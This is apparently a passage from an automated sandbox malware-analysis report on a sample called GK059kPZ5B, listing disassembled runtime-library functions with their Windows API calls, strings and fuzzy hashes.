                                                            • API String ID: 3151764488-3851367110
                                                            • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                            • Instruction ID: b5099d2659ab5da3d856e1a370161b96529dd65552012442df5f2ab280934ec0
                                                            • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                            • Instruction Fuzzy Hash: 1331E575B002249BCF04EF65D881A6E77B5FF84314F60446BE915A7382DB78EE05C798
                                                            Function 00A6EEE2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,00A6F248,00000004,00A67DA7,00000004,00A68089), ref: 00A6EF19
                                                            • GetLastError.KERNEL32(?,00A6F248,00000004,00A67DA7,00000004,00A68089,?,00A687B9,?,00000008,00A6802D,00000000,?,?,00000000,?), ref: 00A6EF25
                                                            • LoadLibraryW.KERNEL32(advapi32.dll,?,00A6F248,00000004,00A67DA7,00000004,00A68089,?,00A687B9,?,00000008,00A6802D,00000000,?,?,00000000), ref: 00A6EF35
                                                            • GetProcAddress.KERNEL32(00000000,00447430), ref: 00A6EF4B
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EF61
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EF78
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EF8F
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EFA6
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EFBD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$ErrorLast
                                                            • String ID: advapi32.dll
                                                            • API String ID: 2340687224-4050573280
                                                            • Opcode ID: 42b6543bbc8b29be41a8bf3c8b8dff5f6d345e4297bc09f77771cd86560ab435
                                                            • Instruction ID: 00fbfcb6941d4e7da3268d1814aea19dbeedd740a1c4f295c906d6f49386d191
                                                            • Opcode Fuzzy Hash: 42b6543bbc8b29be41a8bf3c8b8dff5f6d345e4297bc09f77771cd86560ab435
                                                            • Instruction Fuzzy Hash: F0218EB5904710BFD7116FB49C09A6ABFB8EF05B56F108A2AF141D7651CBBC84408BA8
                                                            Function 00A6EEE5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,00A6F248,00000004,00A67DA7,00000004,00A68089), ref: 00A6EF19
                                                            • GetLastError.KERNEL32(?,00A6F248,00000004,00A67DA7,00000004,00A68089,?,00A687B9,?,00000008,00A6802D,00000000,?,?,00000000,?), ref: 00A6EF25
                                                            • LoadLibraryW.KERNEL32(advapi32.dll,?,00A6F248,00000004,00A67DA7,00000004,00A68089,?,00A687B9,?,00000008,00A6802D,00000000,?,?,00000000), ref: 00A6EF35
                                                            • GetProcAddress.KERNEL32(00000000,00447430), ref: 00A6EF4B
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EF61
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EF78
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EF8F
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EFA6
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A6EFBD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$ErrorLast
                                                            • String ID: advapi32.dll
                                                            • API String ID: 2340687224-4050573280
                                                            • Opcode ID: 568b270db7864284fcb8ae39da317007db6e00d9f6bba130ca6b7ecd6e9fa7a9
                                                            • Instruction ID: 4e9bd9e7265dcff4a283b16b6c172cc77f92bcb426d7b66c265dcf819814a337
                                                            • Opcode Fuzzy Hash: 568b270db7864284fcb8ae39da317007db6e00d9f6bba130ca6b7ecd6e9fa7a9
                                                            • Instruction Fuzzy Hash: 54216DB9904710BBD7116FB49C09A6ABFFCEF05B56F108A2AF141D7651CBBC94408BA8
                                                            Function 00A624C7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,00A6672B), ref: 00A624D6
                                                            • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 00A624E4
                                                            • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 00A624F2
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,00A6672B), ref: 00A62520
                                                            • GetProcAddress.KERNEL32(00000000), ref: 00A62527
                                                            • GetLastError.KERNEL32(?,?,?,00A6672B), ref: 00A62542
                                                            • GetLastError.KERNEL32(?,?,?,00A6672B), ref: 00A6254E
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A62564
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A62572
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                            • String ID: kernel32.dll
                                                            • API String ID: 4179531150-1793498882
                                                            • Opcode ID: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                            • Instruction ID: fdf8ae1d739fe01ee24daab05985b78602287c65367db45d441c7162100552f1
                                                            • Opcode Fuzzy Hash: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                            • Instruction Fuzzy Hash: 9C1182799007107FE7217BB4AD8AB7B7ABCEE01B537100526B402D21A2EA79D900876D
                                                            Function 0043EEC2 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004401AF), ref: 0043EEE5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: DecodePointer
                                                            • String ID: 11@$acos$asin$exp$log$log10$pow$sqrt
                                                            • API String ID: 3527080286-2461957735
                                                            • Opcode ID: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                            • Instruction ID: 47f9428d28cfd6d6d0fcc487ca1ad96a5e838d4e1f3ed62f9574ed722bc2da70
                                                            • Opcode Fuzzy Hash: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                            • Instruction Fuzzy Hash: 1A51A07490160ADBCF14DFA8E6481AEBBB0FF0D300F6551A7E480AB255C7798D29CB1E
                                                            Function 00419766 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419788
                                                            • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419792
                                                            • DuplicateHandle.KERNEL32(00000000), ref: 00419799
                                                            • SafeRWList.LIBCONCRT ref: 004197B8
                                                              • Part of subcall function 00417787: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417798
                                                              • Part of subcall function 00417787: List.LIBCMT ref: 004177A2
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197CA
                                                            • GetLastError.KERNEL32 ref: 004197D9
                                                            • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197EF
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004197FD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                            • String ID: eventObject
                                                            • API String ID: 1999291547-1680012138
                                                            • Opcode ID: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                            • Instruction ID: 74ee1ce6077461ea63ae9e00130f3aceb1e9566028cac9141ddd6988e3fa2b51
                                                            • Opcode Fuzzy Hash: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                            • Instruction Fuzzy Hash: 6511A075600105EACB14EFA5CC49FEF77B8AF00701F20012BF42AE21D1DB789E85866D
                                                            Function 00431E06 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00431E1A
                                                              • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                              • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                            • _free.LIBCMT ref: 00431E26
                                                            • _free.LIBCMT ref: 00431E31
                                                            • _free.LIBCMT ref: 00431E3C
                                                            • _free.LIBCMT ref: 00431E47
                                                            • _free.LIBCMT ref: 00431E52
                                                            • _free.LIBCMT ref: 00431E5D
                                                            • _free.LIBCMT ref: 00431E68
                                                            • _free.LIBCMT ref: 00431E73
                                                            • _free.LIBCMT ref: 00431E81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                            • Instruction ID: 37ceee84360c9df2d19b7be330e975e9230a82d8295317da332a0d8bba7d8220
                                                            • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                            • Instruction Fuzzy Hash: 9111A476100508AFCB02EF56C852CD93BA5EF18355F1190AAFA088F232DA76EF519F84
                                                            Function 00A8206D Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 00A82081
                                                              • Part of subcall function 00A836F1: HeapFree.KERNEL32(00000000,00000000,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?), ref: 00A83707
                                                              • Part of subcall function 00A836F1: GetLastError.KERNEL32(?,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?,?), ref: 00A83719
                                                            • _free.LIBCMT ref: 00A8208D
                                                            • _free.LIBCMT ref: 00A82098
                                                            • _free.LIBCMT ref: 00A820A3
                                                            • _free.LIBCMT ref: 00A820AE
                                                            • _free.LIBCMT ref: 00A820B9
                                                            • _free.LIBCMT ref: 00A820C4
                                                            • _free.LIBCMT ref: 00A820CF
                                                            • _free.LIBCMT ref: 00A820DA
                                                            • _free.LIBCMT ref: 00A820E8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                            • Instruction ID: dc09fae471821eca2b5992b4c4ff4cc63313f2bd26629037dea188cce6a50761
                                                            • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                            • Instruction Fuzzy Hash: 94117476510148BFCF01FF58CA52DDE3BA9EF04790B5149A5BA088F222EA31DF609B80
                                                            Function 0042E1D2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: __cftoe
                                                            • String ID: f(@$f(@
                                                            • API String ID: 4189289331-2391611762
                                                            • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                            • Instruction ID: 3bb8b72b3fcb016b6809a9d2676edbb9e39e2dfdcc2cff5661f77b8cf8a8e7b7
                                                            • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                            • Instruction Fuzzy Hash: 8F511B32600215EBDB249B5BAC41EAF77ADEF49325F90425FF815D6282DB3DD900867C
                                                            Function 004286F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 0042871B
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00428723
                                                            • _ValidateLocalCookies.LIBCMT ref: 004287B1
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 004287DC
                                                            • _ValidateLocalCookies.LIBCMT ref: 00428831
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: 11@$@fB$csm
                                                            • API String ID: 1170836740-1464837749
                                                            • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                            • Instruction ID: 85514cbf9916709cbd5a6cdf55cb31cf47df2c82886cb460035ca25a3a5e93b8
                                                            • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                            • Instruction Fuzzy Hash: E6411634B012289BCF00DF29DC41A9E7BB1AF80328F64815FE8146B392DB399D11CB99
                                                            Function 00A74AD4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00A74AED
                                                              • Part of subcall function 00A74DBC: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00A74820), ref: 00A74DCC
                                                            • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00A74B02
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A74B11
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A74B1F
                                                            • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 00A74B95
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A74BD5
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A74BE3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                            • String ID: 11@
                                                            • API String ID: 3151764488-1785270423
                                                            • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                            • Instruction ID: 0e131b81a5cba3868148b44728170e325ba95573b8138983426b3316bff1c66c
                                                            • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                            • Instruction Fuzzy Hash: 2A31D435A002149BCF14EF68CD81A6D73B5BF89311F24C569E91997252DB70EE05C790
                                                            Function 00A831B0 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
                                                            • Instruction ID: 3fb1a2daaa8b8829ebf679119c6e24d84aacf9faf249b785a1dfc945df24d9f1
                                                            • Opcode Fuzzy Hash: 3beae9f1c9406c94f3234c3fab2046d002450fb23d60068b3c1d9a8504aa6807
                                                            • Instruction Fuzzy Hash: F2C12772D04349AFCF16EFA8C841BADBBB4BF09B01F148199E854A7392D7709A41CB65
                                                            Function 00430EE2 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                              • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                              • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                            • _memcmp.LIBVCRUNTIME ref: 0043118C
                                                            • _free.LIBCMT ref: 004311FD
                                                            • _free.LIBCMT ref: 00431216
                                                            • _free.LIBCMT ref: 00431248
                                                            • _free.LIBCMT ref: 00431251
                                                            • _free.LIBCMT ref: 0043125D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorLast$_memcmp
                                                            • String ID: 11@
                                                            • API String ID: 4275183328-1785270423
                                                            • Opcode ID: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                            • Instruction ID: ce7b668dfa5c2bb7c4e9a3ceca6e831dbf532e5f0ec0879f8663b0dec614f287
                                                            • Opcode Fuzzy Hash: e83dd170e9aceaa49a18aa447ce4e6aa2231a1eba3255cf494227ba5bae8955a
                                                            • Instruction Fuzzy Hash: ABB13975A016199FDB24DF18C894AAEB7B4FF08304F1086EEE949A7360D775AE90CF44
                                                            Function 00A81149 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 266COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00A82161: GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                              • Part of subcall function 00A82161: _free.LIBCMT ref: 00A82198
                                                              • Part of subcall function 00A82161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                            • _free.LIBCMT ref: 00A81464
                                                            • _free.LIBCMT ref: 00A8147D
                                                            • _free.LIBCMT ref: 00A814AF
                                                            • _free.LIBCMT ref: 00A814B8
                                                            • _free.LIBCMT ref: 00A814C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorLast
                                                            • String ID: 11@$C
                                                            • API String ID: 3291180501-2085848483
                                                            • Opcode ID: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
                                                            • Instruction ID: c7bd15b7bba19144aa025097222f030e7a808e000123b03438e48b5f312f84a0
                                                            • Opcode Fuzzy Hash: 59ec6d9c9ee678a81a712376643e3923b663826dc85482b92aac5d645df1fc00
                                                            • Instruction Fuzzy Hash: 72B12B75A012199FDB24EF18C985BADB7B8FF48304F5085AAE949A7350E731AE91CF40
                                                            Function 00A7304B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 00A73071
                                                              • Part of subcall function 00A68AD2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 00A68ADD
                                                            • SafeSQueue.LIBCONCRT ref: 00A7308A
                                                            • Concurrency::location::_Assign.LIBCMT ref: 00A7314A
                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A7316B
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A73179
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                            • String ID: 11@
                                                            • API String ID: 3496964030-1785270423
                                                            • Opcode ID: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                            • Instruction ID: c3375e779162c9ea5788f2e296ca76bf971f44c335dc4844a2410acbe6dad3fa
                                                            • Opcode Fuzzy Hash: 1108ac3f23d22df1866ed980c188d809bd5bf3cbbedc25416d83390793702934
                                                            • Instruction Fuzzy Hash: 4D311132600A119FCF24EF64CC41BAABBB4BF44710F11C669E81A8B282DB30ED05DBD0
                                                            Function 00428CDD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D30
                                                            • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D49
                                                            • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D50
                                                            • PMDtoOffset.LIBCMT ref: 00428D6F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: FindInstanceTargetType$Offset
                                                            • String ID: Bad dynamic_cast!
                                                            • API String ID: 1467055271-2956939130
                                                            • Opcode ID: e5f2063d30d8dc2abb1216183244daa9fe4e349d0d1adbdecd789d64e98e0801
                                                            • Instruction ID: c140271802722e6f94c7424985ceb8b8a000001532c96d06de554d190e41459b
                                                            • Opcode Fuzzy Hash: e5f2063d30d8dc2abb1216183244daa9fe4e349d0d1adbdecd789d64e98e0801
                                                            • Instruction Fuzzy Hash: A02132727062259FCF14DE65F906AAE77A8EF64724B60811FE900D32C1DF3CE805C6A9
                                                            Function 00A6C6E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • atomic_compare_exchange.LIBCONCRT ref: 00A6C6FC
                                                            • atomic_compare_exchange.LIBCONCRT ref: 00A6C720
                                                            • std::_Cnd_initX.LIBCPMT ref: 00A6C731
                                                            • std::_Cnd_initX.LIBCPMT ref: 00A6C73F
                                                              • Part of subcall function 00A51370: __Mtx_unlock.LIBCPMT ref: 00A51377
                                                            • std::_Cnd_initX.LIBCPMT ref: 00A6C74F
                                                              • Part of subcall function 00A6C40F: __Cnd_broadcast.LIBCPMT ref: 00A6C416
                                                            • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 00A6C75D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                            • String ID: 11@
                                                            • API String ID: 4258476935-1785270423
                                                            • Opcode ID: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                            • Instruction ID: 4ebf6e64c7a709f1eeb27c1f8b3639514eb2479ee6efad0df22acb444f923438
                                                            • Opcode Fuzzy Hash: a9be804968ec124da136a858fa875f7bf6ea548f420eac5ce240c38f8c534d78
                                                            • Instruction Fuzzy Hash: 2701F771A00605A7DB10B7A0CE4ABBD7378BF10320F540011F91097281EB74EB4587D1
                                                            Function 0040C63D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C69C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw
                                                            • String ID: :3@$f(@$f(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                            • API String ID: 2005118841-316725708
                                                            • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                            • Instruction ID: d382e3a4140bff2bd7f1e847cb7cd930782ec9a0d5dc38d66c16a87299b4fd47
                                                            • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                            • Instruction Fuzzy Hash: 8BF0FC72900208AAC714DB54DC82BAB33589B15305F14857BED41BA1C2EA7DAD05C79C
                                                            Function 00432154 Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D958,0042D958,?,?,?,004323A5,00000001,00000001,23E85006), ref: 004321AE
                                                            • __alloca_probe_16.LIBCMT ref: 004321E6
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004323A5,00000001,00000001,23E85006,?,?,?), ref: 00432234
                                                            • __alloca_probe_16.LIBCMT ref: 004322CB
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043232E
                                                            • __freea.LIBCMT ref: 0043233B
                                                              • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                            • __freea.LIBCMT ref: 00432344
                                                            • __freea.LIBCMT ref: 00432369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
